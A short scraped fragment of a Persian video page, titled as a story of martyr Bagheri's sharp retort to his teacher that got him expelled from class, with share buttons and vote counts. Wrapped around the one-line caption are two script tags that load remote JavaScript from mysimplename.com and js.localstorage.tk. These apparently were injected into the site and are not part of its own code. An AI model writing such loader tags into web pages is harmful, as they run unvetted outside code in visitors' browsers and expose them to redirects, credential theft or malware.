کنایه سنگین شهید باقری به استادش که باعث اخراجش از کلاس شد


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>آدم به وجد میاد ازاین جواب<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
11

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر